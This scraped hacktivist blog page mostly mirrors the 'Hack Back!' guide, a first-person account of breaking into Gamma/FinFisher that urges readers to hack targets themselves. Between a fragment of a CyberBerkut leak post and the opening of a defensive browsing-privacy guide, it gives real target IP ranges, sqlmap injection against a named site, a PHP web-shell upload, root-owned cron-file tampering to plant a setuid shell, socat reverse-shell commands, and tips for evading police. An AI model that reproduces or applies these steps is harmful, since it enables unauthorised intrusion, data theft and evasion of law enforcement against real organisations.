Poroshenko, after visiting troops and volunteers working on the front
line. Since McCain is referenced by CyberBerkut, it is most likely that
one of his staffers was hacked and not the other senators. Someone needs
to FOIA which staffers accompanied McCain on his trip and if any have
lost their jobs unceremoniously.<br />
——————————————————————————————————————————————————————————————————-<br />
<em>*LeakSource has requested a comment directly from CyberBerkut to
confirm the hack and provide more information. This post will be updated
with their response when it becomes available along with any other
details as they emerge.</em><br />
<em><br /></em>
<em>http://leaksource.info/2015/07/12/leaked-video-shows-making-of-islamic-state-execution-in-studio-via-cyberberkut-hack-of-sen-mccain-staffer/</em></div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2615012028595202594.post-48241693401412199742015-07-13T11:39:00.002+02:002015-07-13T11:41:07.410+02:00Hack Back! A DIY Guide for Those Without the Patience to Wait for Whistleblowers<div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
Hack Back! A DIY Guide for Those Without the Patience to Wait for Whistleblowers</h2>
<small>In <a href="http://leaksource.info/category/archive/" rel="category tag">Archive</a>, <a href="http://leaksource.info/category/gamma-2/" rel="category tag">Gamma</a>, <a href="http://leaksource.info/category/hacking/" rel="category tag">Hacking</a>, <a href="http://leaksource.info/category/internet/" rel="category tag">Internet</a> on <strong>August 9, 2014</strong> at <strong>4:55 PM</strong></small><br />
<div class="entry">
<a href="http://leaksource.files.wordpress.com/2014/08/hacker.jpg"><img alt="hacker" class="aligncenter wp-image-24362" src="http://leaksource.files.wordpress.com/2014/08/hacker.jpg?w=409&h=229" height="229" width="409" /></a><br />
via <a href="https://twitter.com/GammaGroupPR/status/497816900769157122" target="_blank">GammaGroupPR</a> <em>*Mirrored on LeakSource in case it ever disappears from Pastebin. Also included PDFs for all recommended books.</em><br />
<pre><strong> _ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)</strong></pre>
<div style="text-align: center;">
<strong><br /></strong></div>
<div style="text-align: center;">
<strong>A DIY Guide for Those Without the Patience to Wait for Whistleblowers</strong></div>
<div style="text-align: center;">
<strong><br /></strong></div>
–[ 1 ]– Introduction<br />
I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz<br />
it took to <a href="http://leaksource.info/2014/08/06/gamma-finfisher-hack-40gb-of-internal-docs-source-code-from-top-govt-spyware-company-leaked/" target="_blank">0wn Gamma</a>. I’m writing this to demystify hacking, to show how simple<br />
it is, and to hopefully inform and inspire you to go out and hack shit. If you<br />
have no experience with programming or hacking, some of the text below might<br />
look like a foreign language. Check the resources section at the end to help you<br />
get started. And trust me, once you’ve learned the basics you’ll realize this<br />
really is easier than filing a FOIA request.<br />
<br />
–[ 2 ]– Staying Safe<br />
This is illegal, so you’ll need to take same basic precautions:<br />
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]<br />
2) Inside the encrypted volume install Whonix [1]<br />
3) (Optional) While just having everything go over Tor thanks to Whonix is<br />
probably sufficient, it’s better to not use an internet connection connected<br />
to your name or address. A cantenna, aircrack, and reaver can come in handy<br />
here.<br />
[0] <a href="https://truecrypt.ch/downloads/" target="_blank">https://truecrypt.ch/downloads/</a><br />
[1] <a href="https://www.whonix.org/wiki/Download#Install_Whonix" target="_blank">https://www.whonix.org/wiki/Download#Install_Whonix</a><br />
<br />
As long as you follow common sense like never do anything hacking related<br />
outside of Whonix, never do any of your normal computer usage inside Whonix,<br />
never mention any information about your real life when talking with other<br />
hackers, and never brag about your illegal hacking exploits to friends in real<br />
life, then you can pretty much do whatever you want with no fear of being v&.<br />
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable<br />
for some things like web browsing, when it comes to using hacking tools like<br />
nmap, sqlmap, and nikto that are making thousands of requests, they will run<br />
very slowly over Tor. Not to mention that you’ll want a public IP address to<br />
receive connect back shells. I recommend using servers you’ve hacked or a VPS<br />
paid with bitcoin to hack from. That way only the low bandwidth text interface<br />
between you and the server is over Tor. All the commands you’re running will<br />
have a nice fast connection to your target.<br />
<br />
–[ 3 ]– Mapping out the target<br />
Basically I just repeatedly use fierce [0], whois lookups on IP addresses and<br />
domain names, and reverse whois lookups to find all IP address space and domain<br />
names associated with an organization.<br />
<br />
[0] <a href="http://ha.ckers.org/fierce/" target="_blank">http://ha.ckers.org/fierce/</a><br />
For an example let’s take Blackwater. We start out knowing their homepage is at<br />
academi.com. Running fierce.pl -dns academi.com we find the subdomains:<br />
67.238.84.228 email.academi.com<br />
67.238.84.242 extranet.academi.com<br />
67.238.84.240 mail.academi.com<br />
67.238.84.230 secure.academi.com<br />
67.238.84.227 vault.academi.com<br />
54.243.51.249 <a href="http://www.academi.com/" rel="nofollow">http://www.academi.com</a><br />
<br />
Now we do whois lookups and find the homepage of <a href="http://www.academi.com/" rel="nofollow">http://www.academi.com</a> is hosted on<br />
Amazon Web Service, while the other IPs are in the range:<br />
NetRange: 67.238.84.224 – 67.238.84.255<br />
CIDR: 67.238.84.224/27<br />
CustName: Blackwater USA<br />
Address: 850 Puddin Ridge Rd<br />
<br />
Doing a whois lookup on academi.com reveals it’s also registered to the same<br />
address, so we’ll use that as a string to search with for the reverse whois<br />
lookups. As far as I know all the actual reverse whois lookup services cost<br />
money, so I just cheat with google:<br />
“850 Puddin Ridge Rd” inurl:ip-address-lookup<br />
“850 Puddin Ridge Rd” inurl:domaintools<br />
<br />
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and<br />
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more<br />
whois lookups and repeat the process until you’ve found everything.<br />
Also just google the organization and browse around its websites. For example on<br />
academi.com we find links to a careers portal, an online store, and an employee<br />
resources page, so now we have some more:<br />
54.236.143.203 careers.academi.com<br />
67.132.195.12 academiproshop.com<br />
67.238.84.236 te.academi.com<br />
67.238.84.238 property.academi.com<br />
67.238.84.241 teams.academi.com<br />
<br />
If you repeat the whois lookups and such you’ll find academiproshop.com seems to<br />
not be hosted or maintained by Blackwater, so scratch that off the list of<br />
interesting IPs/domains.<br />
<br />
In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com<br />
was simply a whois lookup of finfisher.com which found it registered to the name<br />
“FinFisher GmbH”. Googling for:<br />
“FinFisher GmbH” inurl:domaintools<br />
finds gamma-international.de, which redirects to finsupport.finfisher.com<br />
…so now you’ve got some idea how I map out a target.<br />
This is actually one of the most important parts, as the larger the attack<br />
surface that you are able to map out, the easier it will be to find a hole<br />
somewhere in it.<br />
<br />
–[ 4 ]– Scanning & Exploiting<br />
Scan all the IP ranges you found with nmap to find all services running. Aside<br />
from a standard port scan, scanning for SNMP is underrated.<br />
Now for each service you find running:<br />
1) Is it exposing something it shouldn’t? Sometimes companies will have services<br />
running that require no authentication and just assume it’s safe because the url<br />
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can<br />
go to git.companyname.come/gitweb/ and browse their source code.<br />
2) Is it horribly misconfigured? Maybe they have an ftp server that allows<br />
anonymous read or write access to an important directory. Maybe they have a<br />
database server with a blank admin password (lol stratfor). Maybe their embedded<br />
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s<br />
default password.<br />
<br />
3) Is it running an old version of software vulnerable to a public exploit?<br />
Webservers deserve their own category. For any webservers, including ones nmap<br />
will often find running on nonstandard ports, I usually:<br />
1) Browse them. Especially on subdomains that fierce finds which aren’t intended<br />
for public viewing like test.company.com or dev.company.com you’ll often find<br />
interesting stuff just by looking at them.<br />
<br />
2) Run nikto [0]. This will check for things like webserver/.svn/,<br />
webserver/backup/, webserver/phpinfo.php, and a few thousand other common<br />
mistakes and misconfigurations.<br />
<br />
3) Identify what software is being used on the website. WhatWeb is useful [1]<br />
<br />
4) Depending on what software the website is running, use more specific tools<br />
like wpscan [2], CMS-Explorer [3], and Joomscan [4].<br />
<br />
First try that against all services to see if any have a misconfiguration,<br />
publicly known vulnerability, or other easy way in. If not, it’s time to move<br />
on to finding a new vulnerability:<br />
5) Custom coded web apps are more fertile ground for bugs than large widely used<br />
projects, so try those first. I use ZAP [5], and some combination of its<br />
automated tests along with manually poking around with the help of its<br />
intercepting proxy.<br />
6) For the non-custom software they’re running, get a copy to look at. If it’s<br />
free software you can just download it. If it’s proprietary you can usually<br />
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you<br />
can buy it (lame) or find other sites running the same software using google,<br />
find one that’s easier to hack, and get a copy from them.<br />
<br />
[0] <a href="http://www.cirt.net/nikto2" target="_blank">http://www.cirt.net/nikto2</a><br />
[1] <a href="http://www.morningstarsecurity.com/research/whatweb" target="_blank">http://www.morningstarsecurity.com/research/whatweb</a><br />
[2] <a href="http://wpscan.org/" target="_blank">http://wpscan.org/</a><br />
[3] <a href="https://code.google.com/p/cms-explorer/" target="_blank">https://code.google.com/p/cms-explorer/</a><br />
[4] <a href="http://sourceforge.net/projects/joomscan/" target="_blank">http://sourceforge.net/projects/joomscan/</a><br />
[5] <a href="https://code.google.com/p/zaproxy/" target="_blank">https://code.google.com/p/zaproxy/</a><br />
<br />
For finsupport.finfisher.com the process was:<br />
* Start nikto running in the background.<br />
* Visit the website. See nothing but a login page. Quickly check for sqli in the<br />
login form.<br />
* See if WhatWeb knows anything about what software the site is running.<br />
* WhatWeb doesn’t recognize it, so the next question I want answered is if this<br />
is a custom website by Gamma, or if there are other websites using the same<br />
software.<br />
* I view the page source to find a URL I can search on (index.php isn’t<br />
exactly unique to this software). I pick Scripts/scripts.js.php, and google:<br />
allinurl:”Scripts/scripts.js.php”<br />
<br />
* I find there’s a handful of other sites using the same software, all coded by<br />
the same small webdesign firm. It looks like each site is custom coded but<br />
they share a lot of code. So I hack a couple of them to get a collection of<br />
code written by the webdesign firm.<br />
<br />
At this point I can see the news stories that journalists will write to drum<br />
up views: “In a sophisticated, multi-step attack, hackers first compromised a<br />
web design firm in order to acquire confidential data that would aid them in<br />
attacking Gamma Group…”<br />
<br />
But it’s really quite easy, done almost on autopilot once you get the hang of<br />
it. It took all of a couple minutes to:<br />
* google allinurl:”Scripts/scripts.js.php” and find the other sites<br />
* Notice they’re all sql injectable in the first url parameter I try.<br />
* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with<br />
the option –tamper=’tamper/modsecurityversioned.py’<br />
* Acquire the admin login information, login and upload a php shell [1] (the<br />
check for allowable file extensions was done client side in javascript), and<br />
download the website’s source code.<br />
<br />
[0] <a href="http://sqlmap.org/" target="_blank">http://sqlmap.org/</a><br />
[1] <a href="https://epinna.github.io/Weevely/" target="_blank">https://epinna.github.io/Weevely/</a><br />
<br />
Looking through the source code they might as well have named it Damn Vulnerable<br />
Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in<br />
javascript, and if you’re unauthenticated the admin page just sends you back to<br />
the login page with a Location header, but you can have your intercepting proxy<br />
filter the Location header out and access it just fine.<br />
<br />
[0] <a href="http://www.dvwa.co.uk/" target="_blank">http://www.dvwa.co.uk/</a><br />
<br />
Heading back over to the finsupport site, the admin /BackOffice/ page returns<br />
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the<br />
sqli (it’s nice to have a dozen options to choose from). The other sites by the<br />
web designer all had an injectable print.php, so some quick requests to:<br />
<a href="https://finsupport.finfisher.com/GGI/Home/print.php?id=1" rel="nofollow">https://finsupport.finfisher.com/GGI/Home/print.php?id=1</a> and 1=1<br />
<a href="https://finsupport.finfisher.com/GGI/Home/print.php?id=1" rel="nofollow">https://finsupport.finfisher.com/GGI/Home/print.php?id=1</a> and 2=1<br />
reveal that finsupport also has print.php and it is injectable. And it’s<br />
database admin! For MySQL this means you can read and write files. It turns out<br />
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.<br />
But I can use a short script that uses sqlmap –file-read to get the php source<br />
for a URL, and a normal web request to get the HTML, and then finds files<br />
included or required in the php source, and finds php files linked in the HTML,<br />
to recursively download the source to the whole site.<br />
<br />
Looking through the source, I see customers can attach a file to their support<br />
tickets, and there’s no check on the file extension. So I pick a username and<br />
password out of the customer database, create a support request with a php shell<br />
attached, and I’m in!<br />
–[ 5 ]– (fail at) Escalating<br />
<pre> ___________
< got r00t? >
-----------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
^^^^^^^^^^^^^^^^</pre>
Root over 50% of linux servers you encounter in the wild with two easy scripts,<br />
Linux_Exploit_Suggester [0], and unix-privesc-check [1].<br />
<br />
[0] <a href="https://github.com/PenturaLabs/Linux_Exploit_Suggester" target="_blank">https://github.com/PenturaLabs/Linux_Exploit_Suggester</a><br />
[1] <a href="https://code.google.com/p/unix-privesc-check/" target="_blank">https://code.google.com/p/unix-privesc-check/</a><br />
<br />
finsupport was running the latest version of Debian with no local root exploits,<br />
but unix-privesc-check returned:<br />
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user<br />
www-data can write to /etc/cron.hourly/mgmtlicensestatus<br />
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data<br />
can write to /etc/cron.hourly/webalizer<br />
so I add to /etc/cron.hourly/webalizer:<br />
chown root:root /path/to/my_setuid_shell<br />
chmod 04755 /path/to/my_setuid_shell<br />
<br />
wait an hour, and ….nothing. Turns out that while the cron process is running<br />
it doesn’t seem to be actually running cron jobs. Looking in the webalizer<br />
directory shows it didn’t update stats the previous month. Apparently after<br />
updating the timezone cron will sometimes run at the wrong time or sometimes not<br />
run at all and you need to restart cron after changing the timezone. ls -l<br />
/etc/localtime shows the timezone got updated June 6, the same time webalizer<br />
stopped recording stats, so that’s probably the issue. At any rate, the only<br />
thing this server does is host the website, so I already have access to<br />
everything interesting on it. Root wouldn’t get much of anything new, so I move<br />
on to the rest of the network.<br />
<br />
–[ 6 ]– Pivoting<br />
The next step is to look around the local network of the box you hacked. This<br />
is pretty much the same as the first Scanning & Exploiting step, except that<br />
from behind the firewall many more interesting services will be exposed. A<br />
tarball containing a statically linked copy of nmap and all its scripts that you<br />
can upload and run on any box is very useful for this. The various nfs-* and<br />
especially smb-* scripts nmap has will be extremely useful.<br />
The only interesting thing I could get on finsupport’s local network was another<br />
webserver serving up a folder called ‘qateam’ containing their mobile malware.<br />
<br />
–[ 7 ]– Have Fun<br />
Once you’re in their networks, the real fun starts. Just use your imagination.<br />
While I titled this a guide for wannabe whistleblowers, there’s no reason to<br />
limit yourself to leaking documents. My original plan was to:<br />
1) Hack Gamma and obtain a copy of the FinSpy server software<br />
2) Find vulnerabilities in FinSpy server.<br />
3) Scan the internet for, and hack, all FinSpy C&C servers.<br />
4) Identify the groups running them.<br />
5) Use the C&C server to upload and run a program on all targets telling them<br />
who was spying on them.<br />
6) Use the C&C server to uninstall FinFisher on all targets.<br />
7) Join the former C&C servers into a botnet to DDoS Gamma Group.<br />
It was only after failing to fully hack Gamma and ending up with some<br />
interesting documents but no copy of the FinSpy server software that I had to<br />
make due with the far less lulzy backup plan of leaking their stuff while<br />
mocking them on twitter.<br />
<br />
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password<br />
already so I can move on to step 2! (<a href="https://www.dropbox.com/s/n7xch2vqc9p5x3e/finfisher.torrent?dl=1" target="_blank">Torrent</a>)<br />
<br />
–[ 8 ]– Other Methods<br />
The general method I outlined above of scan, find vulnerabilities, and exploit<br />
is just one way to hack, probably better suited to those with a background in<br />
programming. There’s no one right way, and any method that works is as good as<br />
any other. The other main ways that I’ll state without going into detail are:<br />
1) Exploits in web browers, java, flash, or microsoft office, combined with<br />
emailing employees with a convincing message to get them to open the link or<br />
attachment, or hacking a web site frequented by the employees and adding the<br />
browser/java/flash exploit to that.<br />
<br />
This is the method used by most of the government hacking groups, but you don’t<br />
need to be a government with millions to spend on 0day research or subscriptions<br />
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit<br />
for a couple thousand, and rent access to one for much less. There’s also<br />
metasploit browser autopwn, but you’ll probably have better luck with no<br />
exploits and a fake flash updater prompt.<br />
<br />
2) Taking advantage of the fact that people are nice, trusting, and helpful 95%<br />
of the time.<br />
<br />
The infosec industry invented a term to make this sound like some sort of<br />
science: “Social Engineering”. This is probably the way to go if you don’t know<br />
too much about computers, and it really is all it takes to be a successful<br />
hacker [0].<br />
<br />
[0] <a href="https://www.youtube.com/watch?v=DB6ywr9fngU" target="_blank">https://www.youtube.com/watch?v=DB6ywr9fngU</a><br />
<br />
–[ 9 ]– Resources<br />
<br />
Links:<br />
* <a href="https://www.pentesterlab.com/exercises/" target="_blank">https://www.pentesterlab.com/exercises/</a><br />
* <a href="http://overthewire.org/wargames/" target="_blank">http://overthewire.org/wargames/</a><br />
* <a href="http://www.hackthissite.org/" target="_blank">http://www.hackthissite.org/</a><br />
* <a href="http://smashthestack.org/" target="_blank">http://smashthestack.org/</a><br />
* <a href="http://www.win.tue.nl/~aeb/linux/hh/hh.html" target="_blank">http://www.win.tue.nl/~aeb/linux/hh/hh.html</a><br />
* <a href="http://www.phrack.com/" target="_blank">http://www.phrack.com/</a><br />
* <a href="http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot" target="_blank">http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot</a><br />
* <a href="http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash" target="_blank">http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash</a><br />
* <a href="https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/" target="_blank">https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/</a><br />
* <a href="https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers" target="_blank">https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers</a><br />
(all his other blog posts are great too)<br />
* <a href="https://www.corelan.be/" target="_blank">https://www.corelan.be/</a> (start at Exploit writing tutorial part 1)<br />
* <a href="http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/" target="_blank">http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/</a><br />
One trick it leaves out is that on most systems the apache access log is<br />
readable only by root, but you can still include from /proc/self/fd/10 or<br />
whatever fd apache opened it as. It would also be more useful if it mentioned<br />
what versions of php the various tricks were fixed in.<br />
* <a href="http://www.dest-unreach.org/socat/" target="_blank">http://www.dest-unreach.org/socat/</a><br />
<br />
Get usable reverse shells with a statically linked copy of socat to drop on<br />
your target and:<br />
target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM<br />
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM<br />
It’s also useful for setting up weird pivots and all kinds of other stuff.<br />
<br />
Books:<br />
* <a href="https://leaksource.files.wordpress.com/2014/08/the-web-application-hackers-handbook.pdf" target="_blank">The Web Application Hacker’s Handbook</a> (PDF/13.5MB)<br />
* <a href="http://leaksource.files.wordpress.com/2014/08/hacking-the-art-of-exploitation.pdf" target="_blank">Hacking: The Art of Exploitation</a> (PDF/4MB)<br />
* <a href="https://leaksource.files.wordpress.com/2014/08/the-database-hackers-handbook.pdf" target="_blank">The Database Hacker’s Handbook</a> (PDF/2MB)<br />
* <a href="https://leaksource.files.wordpress.com/2014/08/the-art-of-software-security-assessment.pdf" target="_blank">The Art of Software Security Assessment</a> (PDF/12.6MB)<br />
* <a href="https://leaksource.files.wordpress.com/2014/08/a-bug-hunters-diary.pdf" target="_blank">A Bug Hunter’s Diary</a> (PDF/5.15MB)<br />
* <a href="https://leaksource.files.wordpress.com/2014/08/underground-tales-of-hacking-madness-and-obsession-on-the-electronic-frontier.pdf" target="_blank">Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier</a> (PDF/1.2MB)<br />
* TCP/IP Illustrated – <a href="https://leaksource.files.wordpress.com/2014/08/tcp_ip-illustrated-vol-1.pdf" target="_blank">Vol. 1</a> (PDF/40.2MB) <a href="https://leaksource.files.wordpress.com/2014/08/tcp_ip-illustrated-vol-2.pdf" target="_blank">Vol. 2</a> (PDF/37.9MB) <a href="https://leaksource.files.wordpress.com/2014/08/tcp_ip-illustrated-vol-3.pdf" target="_blank">Vol. 3</a> (PDF/40MB)<br />
Aside from the hacking specific stuff almost anything useful to a system<br />
administrator for setting up and administering networks will also be useful for<br />
exploring them. This includes familiarity with the windows command prompt and unix<br />
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,<br />
networking, etc.<br />
<br />
–[ 10 ]– Outro<br />
You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a<br />
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their<br />
customers are targeting and with what purpose that makes them evil. That’s not<br />
to say that tools are inherently neutral. Hacking is an offensive tool. In the<br />
same way that guerrilla warfare makes it harder to occupy a country, whenever<br />
it’s cheaper to attack than to defend it’s harder to maintain illegitimate<br />
authority and inequality. So I wrote this to try to make hacking easier and more<br />
accessible. And I wanted to show that the Gamma Group hack really was nothing<br />
fancy, just standard sqli, and that you do have the ability to go out and take<br />
similar action.<br />
<br />
Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea<br />
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned<br />
hackers, dissidents, and criminals!<br />
<br />
Related Link: <a href="http://leaksource.info/2014/11/09/recommendations-for-the-hacktivist-community/" target="_blank">Recommendations for the Hacktivist Community</a></div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2615012028595202594.post-71384474183108586372015-05-24T17:16:00.001+02:002015-05-24T17:36:25.364+02:00Safer browsing #GUIDE<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="post_title">
Safer browsing</div>
<div class="post_body">
It is clear that browsing has the most low cost attack vectors for data theft by hackers, tracking by corporations and governmental spying. Safer browsing is a good investment all around.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<a href="https://lilithlela.cyberguerrilla.org/wp-content/uploads/cookies.jpg" target="_blank"><img alt="cookies" class="alignright wp-image-95793" height="275" src="https://lilithlela.cyberguerrilla.org/wp-content/uploads/cookies.jpg" width="420" /></a><br />
<ul>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#threat" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#threat">Threat</a><ul>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#phishing" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#phishing">Phishing</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#malware" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#malware">Malware</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#fingerprinting" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#fingerprinting">Fingerprinting</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#cookies" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#cookies">Cookies</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#search-leakage" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#search-leakage">Search leakage</a></li>
</ul>
</li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#forensics" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#forensics">Computer forensics</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#countermoves" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#countermoves">Countermoves</a><ul>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#choose-browser" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#choose-browser">Choose your browser carefully</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#configure-browser" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#configure-browser">Configuring browsers</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#secure-browser" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#secure-browser">Securing browsers with extensions</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#fix-tracking" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#fix-tracking">Fixing tracking with extensions</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#checks" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#checks">Checks and balances</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#sharing" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#sharing">Sharing contents with others</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#hoaxes" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#hoaxes">Hoaxes & scams</a></li>
</ul>
</li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=2917#search" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=2917#search">Search</a></li>
<li><a href="https://lilithlela.cyberguerrilla.org/?page_id=2917#anti-forensics" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=2917#ant-forensics">Anti forensics</a></li>
</ul>
<h2>
Threats</h2>
<h3>
Phishing</h3>
<em>Bruce Schneier calls these <a href="http://www.schneier.com/crypto-gram-0010.html#1" target="_blank">Semantic Attacks</a>, where the attacker targets the interface between the machine and user. </em>Phishing is an attack where emails are sent out to people in a spam-like broadcast, attempting to get account information. In general, the email seems to come from a genuine (usually banking) institution and includes a URL which the victim is tricked into following. Anno 2015, browsers contain built-in phishing and malware protection.<br />
.linkview overflow:auto; .lv-slider ul, .lv-slider li margin:0; padding:0; list-style-type:none; list-style-image:none; .lv-slider li overflow:hidden; text-align:center; .lv-slider img max-width:100%; .lv-row overflow:auto; .lv-multi-column float:left;<br />
<ul>
<li><a href="http://antiphishing.org/" target="_self" title="AntiPhishing">AntiPhishing</a></li>
<li><a href="http://www.phishing.org/" target="_self" title="Phishing">Phishing</a></li>
</ul>
<h3>
Malware</h3>
<a href="https://lilithlela.cyberguerrilla.org/?page_id=86212" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=86212">Malware</a> can be installed via a web page script which exploits a browser vulnerability. The program will automatically be launched when a user visits an infected site. <a href="http://www.forbes.com/sites/andygreenberg/2012/03/21/meet-the-hackers-who-sell-spies-the-tools-to-crack-your-pc-and-get-paid-six-figure-fees/" target="_blank" title="Forbes 2012: Meet The Hackers Who Sell Spies The Tools To Crack Your PC (And Get Paid Six-Figure Fees)">Compromising a browser is relatively easy</a> and it is cross-platform, hence an often chosen attack vector.<br />
<ul>
<li><a href="http://www.alternet.org/newsandviews/article/479144/plan_solicited_by_chamber_lawyers_included_malware_hacking_to_discredit_progressive_organizations/" target="_self" title="[2011] Plan Solicited By Chamber Lawyers Included Malware Hacking to Discredit Progressive Organizations (The lawyers from the Chamber’s longtime law firm Hunton and Williams had been compiling their own data set on some of these targets. However, the lawyers sought the military contractors for assistance.)">[2011] Plan Solicited By Chamber Lawyers Included Malware Hacking to Discredit Progressive Organizations</a></li>
<li><a href="http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf" target="_self" title="[2012] The many faces of Gh0st Rat (Plotting the connections between malware attacks)">[2012] The many faces of Gh0st Rat</a></li>
<li><a href="https://citizenlab.org/2014/06/backdoor-hacking-teams-tradecraft-android-implant/" target="_self" title="[2014] Police Story: Hacking Team’s Government Surveillance Malware (This report analyzes Hacking Team’s Android implant, and uses new documents to illustrate how their Remote Control System (RCS) interception product works.)">[2014] Police Story: Hacking Team’s Government Surveillance Malware</a></li>
<li><a href="http://www.wired.com/2015/04/researchers-uncover-method-detect-nsa-quantum-insert-hacks" target="_self" title="[2015] How to Detect Sneaky NSA ‘Quantum Insert’ Attacks (Known as Quantum Insert, the man-on-the-side hacking technique has been used to great effect since 2005 by the NSA and its partner spy agency, Britain’s GCHQ, to hack into high-value, hard-to-reach systems and implant malware.)">[2015] How to Detect Sneaky NSA ‘Quantum Insert’ Attacks</a></li>
<li><a href="http://www.theregister.co.uk/2015/04/21/cache_creeps_can_spy_on_web_histories_for_80_of_net_users/" target="_self" title="[2015] JavaScript CPU cache snooper tells crooks EVERYTHING you do online (New research sends browser kingpins scurrying for fixes)">[2015] JavaScript CPU cache snooper tells crooks EVERYTHING you do online</a></li>
<li><a href="http://arstechnica.com/security/2015/04/30/spam-blasting-malware-infects-thousands-of-linux-and-freebsd-servers/" target="_self" title="[2015] Spam-blasting malware infects thousands of Linux and FreeBSD servers (Sophisticated Mumblehard spamming malware flew under the radar for five years.)">[2015] Spam-blasting malware infects thousands of Linux and FreeBSD servers</a></li>
<li><a href="https://citizenlab.org/tag/finfisher/" target="_self" title="Citizenlab: Finfisher (Research into the technologies and companies behind “lawful interception” malware.)">Citizenlab: Finfisher</a></li>
<li><a href="https://citizenlab.org/tag/hacking-team/" target="_self" title="Citizenlab: Hacking Team (Research into the technologies and companies behind “lawful interception” malware)">Citizenlab: Hacking Team</a></li>
<li><a href="https://targetedthreats.net/index.html" target="_self" title="Communities @ Risk (Targeted Digital Threats Against Civil Society)">Communities @ Risk</a></li>
